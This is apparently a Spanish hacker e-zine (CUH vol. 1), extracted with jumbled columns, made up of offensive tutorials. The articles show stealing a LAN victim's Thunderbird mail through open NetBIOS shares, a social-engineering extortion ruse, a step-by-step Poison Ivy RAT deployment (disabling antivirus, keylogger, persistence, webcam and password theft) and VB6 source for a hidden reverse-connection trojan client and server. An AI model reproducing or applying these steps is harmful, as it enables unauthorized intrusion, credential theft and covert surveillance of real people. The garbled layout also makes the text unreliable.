Sei sulla pagina 1di 58

 

 
 

 
CUH e-zine vol #1 - 1ª edición Robo e-mail con NetBios

Robo de E-mails a través de NetBios by Mancuertex(ViPeR)

Introducción e-zine Para acceder a un recurso compartido en concreto


debemos escribirlo después de la IP, seguido del símbolo
del dólar. Ejemplo: \\192.168.1.254/C$
Bienvenido a la primera edición de la CUH e-zine, desde
Ya sabemos usar los recursos compartidos ahora vamos al
aquí agradecemos a todos los colaboradores por sus
grano.
aportes y ayuda prestada.
Necesitamos acceso al PC de la víctima y para ello
También agradecemos la paciencia que han tenido con la
necesitamos saber su IP, así que como estamos en una red
e-zine y esperamos que la e-zine sea de su agrado ya
local, en mi caso bajo un dominio, abriremos la consola
que hemos puesto todo nuestro empeño y esfuerzo en
de Windows y teclearemos el comando Net View
ella.
Esta edición os va a gustar pero la segunda os gustará
aún más.

Robo de E-mails a través de NetBios


En esta primera entrega nos adentraremos en el mundo
de NetBios (Network Basic Input/Output System), que
como muchos ya sabrán es un sistema de entrada y salida
de red utilizado principalmente para el uso compartido de
recursos y servicios en redes locales.

Nosotros lo enfocaremos al robo de datos a través de


una red mal administrada y nos introduciremos en el PC
de la víctima para conseguir los datos de su correo
electrónico sin que note absolutamente nada.

Vamos a empezar por activar el protocolo de red


(Netbios).
Podemos activar NetBios desde las propiedades de
nuestra conexión de Área Local. /Network, el cual nos mostrará que usuarios hay
conectados a nuestra red actualmente.

Mi Net View me devolvió estos datos:

Seguramente tendremos la opción marcada de


“Predeterminado” si esto es así, es que nuestro protocolo
de red permanecía activo y nosotros sin saberlo…
Para activarlo definitivamente escogemos la segunda
opción “Habilitar NetBios sobre TCP/IP”

Una vez activado, ya podemos compartir nuestros


recursos de red, y mejor aún trabajar con los recursos de
red que otros usuarios comparten.

A partir de ahora podremos acceder a un ordenador para


Escogeremos a PC-0036 como víctima, pero todavía no
ver sus recursos compartidos, escribiendo en nuestro
sabemos su IP, aunque con el host ya podríamos trabajar,
navegador o en cualquier ventana de Windows dos
para completar el trabajo resolveremos el host para que
contrabarras y la IP de la máquina con la que queremos
nos devuelva la IP. Es tan sencillo como realizar un ping al
conectar. Ejemplo:\\192.168.1.254 host. Ejemplo: Ping PC-0036
CUH e-zine vol #1 - 1ª edición Robo e-mail con NetBios

pero una vez tenemos acceso el único límite es nuestra


imaginación.

F.A.Q

¿Tengo yo NetBios en mi red?


Bien, ya tenemos la IP 192.168.1.20! Ya podemos empezar
Como ya hemos dicho NetBios es un sistema de entrada y
a explotar sus recursos compartidos. salida de red, el cual hay que tener activado bajo el
Vamos a acceder a través de una ventana tal y como protocolo TCP/IP si deseamos compartir impresoras o
hemos dicho antes, y a comprobar si tiene compartido el
recursos en red con otros ordenadores, por lo tanto si
recurso de red que necesitamos. En este caso es C$.
compartes datos en tu red, tienes el protocolo activado.

Escribiremos \\192.168.1.20/C$ y atención porque ¿Es peligroso tenerlo activado?


nos acaba de mostrar su disco duro, eso quiere decir que
ya tenemos acceso de lectura a su disco, y como En una red bien administrada, no es peligroso, sino
probablemente su red esté muy mal administrada, necesario, ya que nos facilita mucho el trabajo a la hora
tengamos también acceso de escritura, lo que quiere de trabajar remotamente. Pero en una red mal
decir, que podemos modificar cualquier archivo. administrada puede ser peligroso tenerlo activado.

Nuestro objetivo es averiguar que correos electrónicos ¿Cómo puedo proteger mi equipo frente a estos ataques?
guarda en su ordenador así que vamos a averiguarlo…
Navegando por su ordenador, nos damos cuenta que usa Instalando un Firewall o usando el que viene por defecto
Mozilla Thunderbird, un cliente de correo con licencia en Windows XP SP2 o desactivando NetBios sobre TCP/IP.
GNU y nos “complica” un poco mas la cosa, pero sigue
siendo sencillo. ¿Cómo uso NetBios sin riesgos?

Navegando por todas las carpetas de Mozilla Agregando permisos a los recursos compartidos.
Thunderbird, averiguamos que encripta y guarda los e-
mails por defecto con la extensión .MSF en una carpeta Mancuertex (ViPeR)
situada en Datos de Programa. El-Hacker.com

Unos archivos dependen de otros, y sería difícil intentar


abrirlos así por las buenas ya que no conseguiríamos
apenas resultados.

Así que optaremos por instalanos el Mozilla Thunderbird


en nuestro ordenador y copiaremos todos los datos
guardados en el ordenador de la víctima en el nuestro.
De tal forma que Mozilla Thunderbird, abra los e-mails
con la extensión .MSF como si fueran los nuestros propios.

Una vez hemos copiado todos los archivos a nuestra


carpeta, solo tendremos que abrir Mozilla Thunderbird y
aparecerán los correos de nuestra víctima como si de los
nuestros se tratase.

Con acceso de lectura y escritura en el PC de la víctima


podemos hacer 1000 y una cosas, yo he elegido la de
robar e-mails porque es un tema interesante y sencillo,
CUH e-zine vol #1 - 1ª edición Ingeniería social

Ingeniería social by ElPerro


La ingeniería social esta muy desvalorizada hoy en día por la Un ejemplo contemporáneo de un ataque de ingeniería social
comuna informática. A los ingenieros sociales se los trata de es el uso de archivos adjuntos en emails que ejecutan código
idiotas, ignorantes, mentirosos, en fin, cada vez más cercano malicioso (por ejemplo, usar la máquina de la víctima para
al termino LAMMER. Sin embargo, hay que ser mucho más enviar cantidades masivas de spam).
ingenioso en esta práctica que al estar frente a un monitor Ahora, luego de que los primeros emails maliciosos llevaron
dependiendo de los fallos que otras personas hayan a los proveedores de software a deshabilitar la ejecución
cometido al crear un sistema informático. automática de archivos adjuntos, los usuarios deben activar
los archivos adjuntos de forma explícita para que ocurra una
Según Wikipedia.org: acción maliciosa. Muchos usuarios, sin embargo, cliquean
Exploit (del inglés to exploit, explotar o aprovechar) es un ciegamente cualquier archivo adjunto recibido, concretando
programa informático malicioso, o parte del programa, que de esta forma el ataque.
trata de forzar alguna deficiencia o vulnerabilidad de otro Quizá el ataque más simple que aún es efectivo sea engañar
programa (llamadas bugs). El fin puede ser la destrucción o a un usuario llevándolo a pensar que uno es un
inhabilitación del sistema atacado, aunque normalmente se administrador del sistema y solicitando una contraseña para
trata de violar las medidas de seguridad para poder acceder varios propósitos. Los usuarios de sistemas de Internet
al mismo de forma no autorizada y emplearlo en beneficio frecuentemente reciben mensajes que solicitan contraseñas o
propio o como origen de otros ataques a terceros. información de tarjeta de crédito, con el motivo de "crear una
Un "exploit" es usado normalmente para explotar una cuenta", "reactivar una configuración", u otra operación
vulnerabilidad en un sistema y acceder a él, lo que es benigna; a este tipo de ataques se los llama phishing (pesca).
llamado como "rootear". Los usuarios de estos sistemas deberían ser advertidos
temprana y frecuentemente para que no divulguen
contraseñas u otra información sensible a personas que dicen
ser administradores. En realidad, los administradores de
sistemas informáticos raramente (o nunca) necesitan saber la
contraseña de los usuarios para llevar a cabo sus tareas. Sin
embargo incluso este tipo de ataque podría no ser necesario
— en una encuesta realizada por la empresa InfoSecurity, el
90% de los empleados de oficina de la estación Waterloo de
Londres reveló sus contraseñas a cambio de un bolígrafo
barato.

Esta es la definición de Wikipedia.org para “explotar” un


error en un sistema. Es sabido que el ser humano es
probablemente, el sistema más complejo de la naturaleza,
desgraciadamente, también es el bug mas sensible de todo
sistema organizado. Precisamente esto vamos a aprender, a
explotar el peor error en la organización informática; el que
se encuentra entre el teclado y la silla.

En el campo de la seguridad informática, ingeniería social es


la práctica de obtener información confidencial a través de la
manipulación de usuarios legítimos. Un ingeniero social
usará comúnmente el teléfono o Internet para engañar a la
gente y llevarla a revelar información sensible, o bien a violar
las políticas de seguridad típicas. Con este método, los
ingenieros sociales aprovechan la tendencia natural de la
gente a confiar en su palabra, antes que aprovechar agujeros
de seguridad en los sistemas informáticos. Generalmente se
La ingeniería social también se aplica al acto de
está de acuerdo en que “los usuarios son el eslabón débil” en
manipulación cara a cara para obtener acceso a los sistemas
seguridad; éste es el principio por el que se rige la ingeniería
computacionales.
social.
Entrenar a los usuarios en el uso de políticas de seguridad y
CUH e-zine vol #1 - 1ª edición Ingeniería social

asegurarse de que son seguidas es la principal defensa 3 - Llaman a su abogado para ser asesorados.
contra la ingeniería social.
Uno de los ingenieros sociales más famosos de los últimos 4 - Preguntan como pueden solucionar el asunto.
tiempos es Kevin Mitnick [El cóndor]. Según su opinión, la
ingeniería social se basa en estos cuatro principios: 5 - Llaman a Microsoft Corp. para verificar la identidad del
inspector [a correr!!!]
* Todos queremos ayudar.
Siempre, el Ingeniero Social va a tratar de llegar al punto 1 o
* El primer movimiento es siempre de confianza hacia el otro. 4 y es entonces donde abre su maletín y saca la
documentación.
* No nos gusta decir No. Formulario de amonestación por uso indebido de software y
bla bla bla, se notifica al banco que se va a impartir una
* A todos nos gusta que nos alaben. multa de XXX [suma muy grande]. Es muy posible que el
banco no quiera pagar tal multa y simplemente le pagan un
Si bien estos conceptos son claros, concisos y con un alto valor menor a nuestro Ingeniero Social. Fin del asunto...
grado de verdad, no son absolutos.

Habla de que la Ingeniería Social se aplica a la informática,


es cierto, últimamente se asocia el término a hackers e
intrusión de sistemas, pero no es del todo completa la
definición.

En los años 50 y 60 se destaco un personaje emblemático


para cualquier Ingeniero Social, hablo de Franck Abgnale Jr.
Un joven que a los 17 años engañaba a sus maestros, padres ESTO ES SOLO FICTICIO!!! Basado en una situación cómica
y compañeros para obtener algún provecho. Este personaje que ocurrió en mi trabajo hace mucho tiempo cuando le
puede ser visto en toda su magnificencia en la película hicimos un chiste al gerente de la empresa [no era un banco]
"Atrápame si puedes" con Tom Hanks y Leonardo Di Caprio. y al encargado del centro de cómputos. El chiste nos salio
bien, el director de la empresa estaba desesperado por no
¿Como se usa la Ingeniería Social? ligar la multa y quiso sacarse el problema de encima lo
Hay muchas formas de usarla, con ingenio podemos ser antes posible, podían despedirlo por algo así. Suerte que no
personal de limpieza, abogados, contadores, consultores o se enojo, nos castigo con trabajos forzados nada mas...pero
vagabundos. estuvo muy gracioso el asunto.
Hablo de disfraces [no es chiste].

Imaginemos la situación [Solo es un ejemplo, no quiere decir


que pueda derivar en una situación real]:
Entra un joven de traje y corbata, un gafete con datos y En conclusión. Esto fue solo un ejemplo de aplicación en la
logotipo de una gran empresa de software y un maletín con vida real sin necesidad de engañar a alguien vía Internet, es
documentaciones varias al banco y solicita hablar con EL más peligroso, pero sin duda más divertido.
GERENTE Y CON EL JEFE DE SISTEMAS.
Inmediatamente solicita un inventario con los seriales de los En la próxima entrega analizamos mayores problemas
sistemas operativos usados en cada terminal y solicita ver derivados en el engaño del cual todos podemos ser víctimas.
cada una de ellas. ElPerro – Río Gallegos, Provincia de Santa Cruz,
Gran problema para los directivos del banco, vino un Argentina
inspector de Microsoft Corp. a ver si tenemos MS/Windows
original instalado en nuestras PC...Y NO TENEMOS NI
UNO!!!!
En este caso puede pasar lo siguiente:

1 - Te ofrecen una coima en dinero.

2 - Se disculpan y prometen obtener licencias.


CUH e-zine vol #1 - 1ª edición Uso de troyanos

Guía del uso de troyanos by Froseck

Introducción Servicio NO-IP


Saludos, soy FroSeck y he hecho este manual dividido en Bueno como hemos visto antes en los troyanos de
dos partes con el único fin de solucionar aquellas dudas conexión inversa (que son los que vamos a tratar en este
que puedan tener los usuarios mas principiantes en este manual) es necesario que pongamos al crear nuestro
tema y guiarlos en el uso de troyanos de conexión servidor nuestra IP, pero ¿qué pasaría si nuestra IP fuera
inversa sin responsabilizarme del mal uso que hagáis de dinámica? Pues pasaría que nuestra víctima se
éste. Espero que os sirva de gran ayuda. conectaría a nosotros hasta que se nos cambie por otra.
Entonces la perderíamos y no se podría conectar debido
Conceptos básicos a que nuestra IP ya no es la que pusimos en la
Para empezar en este manual creo que lo mejor será configuración del server. Para evitar esto tenemos que
tener bien claro unos conceptos imprescindibles para utilizar servicios como NO-IP. Este servicio lo que hace
saber lo que estamos haciendo. es redireccionar la conexión que hace el servidor a
nuestro ordenador. Para utilizar este servicio lo primero
TroyanoÆ Programa generalmente dividido en dos
que tenemos que hacer es:
partes, el cliente y el servidor, cuya interacción permite
controlar ordenadores ajenos (víctimas) en los que ha Acceder a su web ->>> www.no-ip.com
sido introducido incorporado en otra aplicación
aparentemente inofensiva. Se distinguen dos tipos de Hacer click donde pone Sign-up Now!
troyanos:
Conexión directaÆ El cliente se conecta a la victima Seguir los pasos para registrarse y obtener una cuenta.
(servidor) mediante su IP. Este
Activamos nuestra cuenta y nos logueamos.
método está en desuso ya que es necesario saber cual es
la IP de nuestra víctima y que no use router.
Hacemos click en el menú de la izquierda donde pone
Conexión inversaÆ La víctima (servidor) se conecta a
add y escribir únicamente el hostname que puede ser
nosotros (cliente) mediante nuestra IP. Este método es el
un nombre cualquiera y en Host Type seleccionamos
usado por la gran mayoría debido a su gran facilidad,
DNS Host (A) y ya esta, ahora le tenemos que dar (más
aunque tiene algunos problemas que solucionaremos
abajo) a Create Host.
mas adelante.
ClienteÆ Parte de un troyano que accede a los servicios Una vez creado volvemos a Hosts / Redirects y esa
ofrecidos por un programa llamado servidor. dirección (EJ: "ola.no-ip.org") que vemos será lo que
ServidorÆ Parte de un troyano que realiza tareas en sustituirá a nuestra IP en la configuración del servidor.
beneficio de otras aplicaciones llamadas clientes.
IPÆ (Internet Protocol) es un conjunto de cuatro números Ahora nos tenemos que instalar el programa NO-IP DUC
del 0 al 255 separados por puntos con los cuales se que descargaremos de aquí ->>>
identifica a un ordenador conectado a una red que corre http://www.descargarlo.com/descargar-1957-
bajo este protocolo. Nuestra IP puede ser estática (si DUC.No_Ip.html
siempre es la misma) o dinámica (si cuando reiniciamos
Una vez instalado lo ejecutamos y escribiremos nuestros
la conexión cambia). Se pueden distinguir dos IPs en un
datos de la cuenta y nos aparecerá la dirección de
ordenador.
nuestro host que creamos anteriormente. Así quedaría:
PuertoÆ Mecanismo por la cual entra y sale la
información de una computadora. Para que se entienda Es importante que la
mejor, podemos decir que es una “puerta” que se utiliza carita salga
para intercambiar información de un sitio a otro y para sonriente como en la
que se de lugar el intercambio tiene que estar abierta. imagen si no es que
JoinerÆ Programa que se encarga de unir dos o más hemos hecho algo
archivos en uno solo que tendrá como extensión “.exe”. mal. Cuando
RouterÆ Aparato encargado de dirigir el tráfico de estemos usando
paquetes de un lugar a otro. algún troyano es
necesario ejecutar
este programa
porque si no jamás
se nos conectara
CUH e-zine vol #1 - 1ª edición Uso de troyanos

nuestra víctima (servidor). Con este servicio podremos dándole a Test Connections (tenemos que tener activo el
conectarnos en cualquier ordenador a nuestra víctima NO-IP DUC). Si aún así os sale una X (no os funciona) y
mientras tengamos el cliente del troyano y nuestro NO-IP tenéis un router es normal así que leer el apartado
DUC ya que da igual la IP que tengamos. Mapear puertos del manual. El recuadro ID será el
nombre de identificación que nos aparecerá para que
Creación y configuración del servidor sepamos quien es. Luego deberemos poner la contraseña
Ahora nos toca elegir el troyano que más nos guste, por que pusimos antes al configurar el cliente, si ponemos
supuesto de conexión inversa. Yo recomiendo el Poison otra no se nos conectará. Lo demás lo dejamos como
Ivy 2.3 que podemos descargar de aquí: está. Le damos a Next y nos aparece esta ventana:

http://www.poisonivy-rat.com/dl.php?file=PI230

Es importante que antes de descargarlo desactivemos


nuestro AV (antivirus) para que no nos lo borre y poder
trabajar con él. Cuando descomprimamos el RAR
haremos clic en el archivo “Poison Ivy 2.3.0.exe” que es
nuestro cliente que usaremos para controlar a nuestra
víctima y para crear el servidor que posteriormente le
mandaremos. Para empezar a configurarlo todo le
daremos a File y a New Client y nos saldrá esto:

La primera casilla sirve para crear una entrada en el


registro y ejecutarse en cada inicio de Windows.
Recomiendo desactivarla ya que algunos AV como el
Kaspersky lo detectarían por heurística y nuestro troyano
se volvería detectable. También recomiendo desactivar la
casilla Copy File que sirve para que se autocopie a una
carpeta y así permanecer oculto ya que también es
detectada por algunos AV. Estos problemas los
solucionaremos en la siguiente parte de este manual
para que se inicie con Windows, se oculte y sea
indetectable. Luego vienen tres casillas, la primera hace
Dejaremos el Puerto por defecto (3460) si queremos,
que el servidor se auto-elimine al ejecutarse cosa que no
luego pondremos nuestra contraseña en el recuadro y
nos conviene en nuestra configuración así que lo
haremos click en Start. Ahora toca configurar nuestro
desactivamos. Luego las dos siguientes (Keylogger para
servidor. Le damos a File y a New Server. Ahora le
ver lo que escribe nuestra víctima) y Persistence (para
damos a create profile y nos saldrá un recuadro para
que sea mas difícil borrar el servidor) las activamos. Le
ponerle el nombre a el perfil (ponemos lo que
damos a Next y nos aparece esto:
queramos).

Luego nos saldrá esta ventana:

La casilla de Inject sirve para inyectarse en otro proceso.


La dejamos desactivada y así por defecto se inyecta en el
proceso “explorer.exe”. Lo dejamos todo como esta y le
¿Recordáis la dirección del host que creamos antes? Pues
damos a Next y simplemente le ponemos un icono si
ahora debemos añadirla a nuestro server para que se
queremos y luego dejando todo como esta le damos a
nos conecte. Le damos a Add y luego ponemos nuestra
Generate y ya tenemos nuestro server creado. Para
dirección e importante poner puerto 3460 (o si lo
terminar de tenerlo todo configurado haremos click en
cambiamos poner ese). Podemos probar si va bien
Preferences (al lado de File) y en la pestaña General
CUH e-zine vol #1 - 1ª edición Uso de troyanos

deberá estar activado el Auto-Refresh. Le damos clic en tiene ninguna utilidad.


Ok y estamos listos para recibir una conexión. Active Ports: Da un listado de todos los puertos abiertos.
Remote Shell: Sirve para obtener una Shell de la víctima
A continuación explicaré brevemente como usar el cliente y manejar la consola.
para hacer lo que deseemos en el ordenador de nuestra Cached: Da un listado de las contraseñas almacenadas
víctima. Lo mejor que podéis hacer para aprender a por un navegador (EJ: Firefox).
usarlo es probando vuestros servidores con vosotros NT/NTLM Hashes: Obtiene los hashes del archivo sam
mismos y viendo las opciones que trae este troyano con para poder (si quieres) crackearlos por tu cuenta y sacar
vosotros. Si cuando los probáis con vosotros mismos no las contraseñas de inicio de sesión de Windows.
funciona es porque como dije antes o lo habéis hecho Wireless: Obtiene las contraseñas almacenadas de redes
mal o tenéis un router y en el apartado Mapear puertos inalámbricas.
lo podéis solucionar. Keylogger: Permite ver lo que ha escrito la víctima
aunque tú no estés presente.
Uso del cliente Audio Capture: Permite capturar sonido si la víctima tiene
Para poder seguir con este apartado debemos de tener
un micrófono.
una víctima. Nosotros serviremos. Haremos una copia
Screen Capture: Permite hacer una captura de pantalla a
de nuestro servidor y lo meteremos en una carpeta como
la víctima.
copia de seguridad y luego lo ejecutamos (con el AV
Webcam Capture: Permite ver a la víctima a través de su
desactivado ya que aun no es indetectable). Una vez que
Webcam si la tiene.
hagamos dos clicks en nuestra víctima nos saldrá esta
Remote Port Scanner: Permite ver que puertos tiene
columna que procederé a explicar brevemente:
abiertos la víctima.
Edit ID: Cambia el nombre con el que se identifica
nuestra víctima.
Share: Permite compartir nuestra víctima con otra
persona.
Update: Permite sustituir nuestro servidor por otro.
Restart: Resetea el servidor por si hay mucho ping por
ejemplo.
Unnistall: Borra nuestro servidor del ordenador de
nuestra víctima.

Mapear puertos
Si tenéis un router y aun no se os conecta el servidor a
vuestro cliente es porque no habéis abierto el puerto
correspondiente. Tenéis que ir a la configuración de
vuestro router y abrirlo y redireccionar el tráfico que
entre por ese puerto a tu ordenador. Para ello tienes que
saber cual es tu IP privada. Ve a inicio, ejecutar, escribes
cmd y luego ipconfig. Ahí te aparecerá tu IP privada (la
que tienes dentro de tu red). Otra cosa importante es la
Information: Nos da información del SO de nuestra puerta de enlace que en mi caso es 192.168.1.1. Para
víctima y del servidor. acceder a la configuración de tu router debes de teclear
Files: Desde aquí podemos manejar los archivos de la puerta de enlace en la barra de direcciones de tu
nuestra víctima. navegador y luego pones usuario y contraseña y listo.
Search: Busca archivos en el disco duro de la víctima. Una vez dentro tendrás que encontrar un apartado
Regedit: Permite editar el registro. donde te permita abrir los puertos. En mi caso tengo un
Search: Permite buscar una clave en el registro de Linksys WRT54G Wireless-G Router. Hay muchos mas
nuestra víctima. modelos de routers y por supuesto no puedo hacer un
Processes: Da un listado de los procesos de nuestra manual para cada uno. Pero estoy seguro que si
víctima. investigáis un poco lograreis abrirlos. Además siempre
Servicios: Da un listado de los servicios de nuestra tendréis a www.google.com o a nuestro foro http://foro.el-
hacker.com
víctima.
Installed Applications: Da un listado de todas las
Al hacer lo antes descrito e ir a la parte donde se abren
aplicaciones instaladas.
los puertos aparece esto:
Windows: Da un listado de las ventanas abiertas en el
ordenador de la víctima.
Relay: sirve para ver y manipular el trafico entre los
diferentes proxys y servidores. Para nuestro servidor no
CUH e-zine vol #1 - 1ª edición Uso de troyanos

informático,    la  mayor  virtud    que  debe 


poseer un troyano es la de ser indetectable, 
he ahí el dilema,  existen diversas técnicas 
para  troyanizar  un  computador,  por  medio  de 
blindeo de imágenes, incrustados en archivos 
comprimidos,  embebidos  en    diapositivas, 
encriptados  (muchos  se  valen  de  tremendas 
artimañas‐>Lammeradas):  entrando  a  foros  de 
discusión,  se  familiarizan  (hacen  amigos)  y 
después  sueltan  (la  bomba)  una  serie  de 
"aportes"  (infectados)  todos  ellos  tan 
pulcros  ahí  embebidos  :)  dispuestos  a 
prestar  una  mano  a  los  incautos,  que  a 
cualquier  enlace  de  descarga  hacen  clic. 
Cosas de la vida. Una vez se ha  troyanizado 
En application se puede poner cualquier nombre. En Start un  sistema,  se  tiene  acceso  total,  el 
y End se pone el puerto que has escogido, en mi caso el funcionamiento  de  un  troyano  radica  en  la 
3460. En Protocol se deja en Both. En IP Address pones tu instalación  de  dos  programas  básicos: 
IP privada, luego le das a Enable y lo guardas. Para que cliente  y  servidor,  compartiendo  el  mismo 
se entienda mejor todo esto que estamos haciendo os puerto,  el  servidor  es  el  programa  que  se 
pongo este esquema de una conexión inversa si estamos instala  en  la  victima  (no  importa  el  método 
detrás de un router: de  romanización  que  se  infrinja),  y  el 
cliente se instala en nuestro computador, el 
cliente  es  que  ordena  y  el  server  obedece,  
se  pueden    tener  varias  víctimas, 
simplemente  con  cambiar  el  numero  de  la  IP 
de  el  server  ya  rotamos  de  esclavo,    ;)
     

Se ve como nuestra víctima se conecta a nuestro host Nota Editorial


guiafroseck.no-ip.org por el puerto 3460 y este lo
redirecciona a nuestro router con IP 80.130.10.100.
Gracias a que hemos mapeado el puerto 3460 el router
es capaz de mandar la conexión a nuestro ordenador
que en este caso tiene de IP privada 192.168.1.4. Ahora
sólo queda hacer indetectable y camuflar nuestro
servidor, hasta la segunda parte. By FroSeck

Troyano o Caballo de Troya 
Un troyano o caballo de Troya es un malware‐
‐>  Código  malicioso‐‐>MALicious  softWARE  ‐, 
por  lo  general  es  un  programa  que    permite 
el  acceso  remoto  de  un  PC  (muchos  de  ellos 
fueron  en  un  principio  programas    creados 
para  la  supervisión  de  redes  de  sistemas  de 
información)  ,  hoy  en  dia  es  una  de  la 
formas  mas  fáciles  de  vulnerar  un  sistema 
CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

Troyano de conexion Inversa By Don Nadie

En este apartado vamos a aprender a crear un Troyano de -Cam


conexión inversa en VB 6. -Admin
-Version
La conexión inversa, es la victima la que se conecta a ti,
contrario de los de conexión directas en que eres tu quien se Bueno esto es a gusto, yo lo haré así, ustedes como vean.
conecta a la victima. El tamaño también lo ajustan al gusto(el ancho de cada
Con esto podemos tener a varias victimas a la vez y no de columna).
una en una y además si están detrás de un router funcionará A mi me gusta que tenga la propiedad Gridlines, que es las
;) rejillas, como el bifrost, bueno ya verán la imagen, para el
Bueno empecemos por crear un nuevo proyecto. que le guste, Tughack(Sniper) lo explicó en el foro, y también
Vamos a Proyecto>Componentes y marcamos los siguientes la propiedad Multiselect, así que les dejo el link:
controles: http://foro.el-hacker.com/index.php/topic,78815.0.html
-Microsoft Windows Common Controls 5.0 (con el 6.0 al
Listview no se le puede aplicar estilo XP). También explica el estilo XP, así que no explicaré eso….
-Microsoft Winsock Control 6.0
Bueno ,el aspecto(en ejecución, después de ser compilado y
Ahora pasamos a insertar los componentes necesarios, esto agregado el estilo XP)debería ser parecido a este:
puede variar según cada uno, como le guste etc…

Vamos a añadir el Listview que es este control:

En nombre, yo le puse LV
En el cuadro propiedades, en personalizado debéis tenerlo
así:

Como dije , ustedes pónganle las opciones que quieran…


Ahora vamos a añadirle un label, que abajo, donde nos
mostrará el estado y eso.
En Borderstyle, pónganle FixedSingle.
Ahora añadan al formulario el control Winsock:

Y en la propiedad nombre pónganle WS(por comodidad….).


Y en Index pónganle el valor 0.
Un Timer interval a 1.

Añádanle un menú, vayan a Herramientas>Editor de Menús.


En caption Escriban Menú, y en name igual. Desmarquen la
propiedad Visible.

Luego denle insertar, denle a la flecha que va hacia abajo, y


luego a la flecha que va apunta a la derecha. Y en caption
Nos vamos a encabezados de columna, y añadimos las pongan “Cambiar Nombre” y de nombre “Name”.
siguientes columnas: Esto es lo que deberían tener:
-Nombre
-IP
-Nick/Nombre PC
-S.O
-RAM
-Pais
-CPU
CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

On Error Resume Next


total = total + 1 ‘sumamos 1 a esta variable
WS(Index).Close ‘cerramos la conexion
WS(Index).Accept requestID ‘aceptamos la peticion
Load WS(total)

WS(total).Listen ‘nos ponemos a la escucha(pero


fijenese que le sumamos 1,proque el indice esta
ocupado,se hizo conexion con ese indice asique le
sumamos 1 para aceptar nuevas)escuhamos con ese
indice

End Sub
Private Sub LV_Mousedown(Button As Integer, Shift As
Integer, x As Single, y As Single) ‘al clicar(en relaidad
cuando se suelta el mouse)
On Error Resume Next
If lv.selectedItem.Selected = False Then ‘si no hay nada
seleccionado salimos
Acepten. Exit Sub ‘salimos
Bueno vamos a ver un poco de codigo: ElseIf Button = 2 Then ‘sino,si se pulsó el boton
2(derecho)
CLIENTE PopupMenu Menu ‘mostramos el menu Menu
End If
Public total as integer End Sub
Private sub form_load() ‘al cargar el formulario
WS(0).LocalPort = 2300 ‘escuchamos en el puerto 2300 Private Sub name_click() ‘al clicar en change name(de
‘Nota,seria mejor hacer un nuevo formulario,llamado nombre name)
Settings en donde se especifique el puerto ha lv.StartLabelEdit ‘que podamos editar el nombre
escuchar,pero de momento mejro dejenlo fijo End Sub
WS(0).Listen ‘Nos ponemos a la escucha Private Sub lv_AfterLabelEdit(Cancel As Integer,
Label1.Caption = "Escuchando en el puerto " & “2300” NewString As String)’despues de cambiar el nombre
total = 0 ‘la variable totalindex sea 0 WS(lv.SelectedItem.Index - 1).Senddata "nombrecan|" &
End Sub NewString ‘enviamos el identificador y el valor que se
puso
Private Sub Timer1_Timer()
Dim v As Long, marca() As String End Sub
On Error Resume Next
For v = 1 To lv.ListItems.Count ‘bucle que recorre todos Private Sub WS_DataArrival(Index As Integer, ByVal
lso elementos del listview bytesTotal As Long) ‘cuando recibimos datos
marca = Split(lv.ListItems(v).Key, "|") ‘esto e sun
identificador,lo sacamos de la key Dim datos as string
If WS(marca(0)).State <> 7 Then ‘si el estado de ese no Dim data() as string ‘array
es conectado WS(Index).GetData datos ‘recibimos los datos y los
lv.ListItems.Remove (v) ‘lo eliminamos de la lista porque guardamos en la variable “datos”
no estamos conectados Data=Split(datos,”|”)’partimos la variable datos por el
End If identificador “|”,para separar datos
Next
Me.Caption = "Troyanito - " & lv.ListItems.Count & " Select case Data(0)’según lo que contenga .Data(0) es
conectado(s) -" 'ponemos el nombre de nuestro troyano el primer dato,usaremos eso como identificador
y el nº de conectados
End Sub Case “Conexion”
….
Private Sub WS_ConnectionRequest(Index As Integer, End select
ByVal requestID As Long) ‘cuando hay conexion End Sub
CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

Me.visible=false ‘para que no se vea el form….


‘Esto es para la webcam
Bueno, eso lo dejamos así, porque primero tenemos que Dim temp As Long
poner código en el servidor, luego modificaremos esa parte.
hwdc = capCreateCaptureWindow("CapWindow",
Ahora abran un nuevo proyecto, este será el server, añádanle ws_child Or ws_visible, _
también el Winsock y de nombre también WS,el aspecto nos 0, 0, 320, 240, Picture1.hwnd,
da igual ya que no se verá ☺ 0)
Y un timer, enabled true e interval 1. If (hwdc <> 0) Then
Un picture1. webcam = "Si" ‘entonces si tenemos webcam
temp = DestroyWindow(hwdc)
SERVIDOR temp = SendMessage(hwdc,
WM_CAP_DRIVER_DISCONNECT, 0&, 0&)
Dim victima as string,name1 as string,so as string,ip as DoEvents
string,port as string,webcam as string,pais as string ,tor
Else
as string,nombrepc as string,procesador as string webcam = "No" ‘pues no
Dim admin as boolean End If
Private Sub form_load() pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME)
On error resume next ‘para obtener el país
Open Environ("windir") & "\KB007.txt" For Input As #1
‘abrimos un archivo de texto en el directorio de admin = CBool(IsNTAdmin(ByVal 0&, ByVal 0&))’para
windows saber si somos admins o no
Input #1, victima ‘leemos el contenido de este
If admin = True Then
If victima = "" Then ‘si esta vacio tor = "Si"
victima = "Default" ‘le ponemos default a la victima Else
End If ‘sino victima contendrá lo que contenga ese
tor = "No"
archivo, eso es para cuando cambiemos el nombre a la End If
victima. End Sub
Close #1
‘la función para obtener el idioma y pais
Public Function ObtenerIdioma(ByVal lInfo As Long) As
Dim yo As Object String
Set yo = CreateObject("wscript.shell")
Dim buffer As String, ret As String
buffer = String$(256, 0)
pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) ret = GetLocaleInfo(LOCALE_USER_DEFAULT, lInfo,
buffer, Len(buffer))
nombrepc = Environ("ComputerName")’esta variable 'Si Ret devuelve 0 es porque falló la llamada al Api
contendrá el nombre del pc If ret > 0 Then
name1 = Environ("UserName")’el nombre de usuario
ObtenerIdioma = Left$(buffer, ret - 1)
so = Else
yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Mi ObtenerIdioma = ""
crosoft\Windows NT\CurrentVersion\Productname")’el
End If
sistema operativo End Function
ip = "127.0.0.1" ‘la ip, pueden hacer un edit server
port = 2300 ‘lo mismo, con el edit server lo editan….
‘función para obtener la memoria ram
Public Function GetRamSize() As String
procesador = Dim RamStats As MEMORYSTATUS
yo.regread("HKEY_LOCAL_MACHINE\HARDWARE\D
GlobalMemoryStatus RamStats
ESCRIPTION\System\CentralProcessor GetRamSize = Round((RamStats.dwTotalPhys / 1024) /
